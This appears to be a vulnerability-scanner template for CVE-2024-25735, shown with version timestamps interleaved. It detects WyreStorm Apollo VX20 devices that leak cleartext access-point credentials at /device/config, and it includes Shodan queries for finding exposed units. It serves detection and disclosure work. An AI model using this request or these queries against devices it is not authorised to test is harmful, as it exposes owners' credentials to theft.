2024-02-12 22:32:40 +00:00
id : CVE-2024-25735
2024-02-13 04:32:11 +00:00
2024-02-12 22:32:40 +00:00
info :
2024-02-13 04:38:52 +00:00
name : WyreStorm Apollo VX20 - Information Disclosure
2024-02-12 22:32:40 +00:00
author : johnk3r
severity : high
2024-02-13 04:32:11 +00:00
description : |
An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.
2024-02-12 22:32:40 +00:00
reference :
- https://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_INCORRECT_ACCESS_CONTROL_CREDENTIALS_DISCLOSURE_CVE-2024-25735.txt
2024-02-13 04:32:11 +00:00
- https://packetstormsecurity.com/files/cve/CVE-2024-25735
2024-05-31 19:23:20 +00:00
- http://packetstormsecurity.com/files/177082
- https://hyp3rlinx.altervista.org
- https://github.com/codeb0ss/CVE-2024-25735-PoC
classification :
epss-score : 0.00381
epss-percentile : 0.72907
2024-02-12 22:32:40 +00:00
metadata :
verified : true
max-request : 1
2024-02-13 04:32:11 +00:00
vendor : wyrestorm
product : apollo vx20
2024-06-07 10:04:29 +00:00
shodan-query :
- ssl:"WyreStorm Apollo VX20"
- ssl:"wyrestorm apollo vx20"
2024-03-23 09:28:19 +00:00
tags : packetstorm,cve,cve2024,wyrestorm,info-leak
2024-02-12 22:32:40 +00:00
http :
- method : GET
path :
- "{{BaseURL}}/device/config"
2024-02-12 22:34:42 +00:00
matchers-condition : and
2024-02-12 22:32:40 +00:00
matchers :
- type : word
words :
2024-02-13 04:32:11 +00:00
- '"password":'
- '"softAp":'
condition : and
2024-02-12 22:34:42 +00:00
- type : word
part : header
words :
- 'application/json'
- type : status
status :
- 200
2024-06-01 06:53:00 +00:00
# digest: 4b0a0048304602210094aa267e9fcefa3b5cf6035541b466cd9772aa5cfe6735980c1bd6d4f2c481d9022100c63d8c195e067f627d83b89909d50cb22d9b5f1c25edc5d8fb8edad4d04458cb:922c64590222798bb761d5b6d8e72950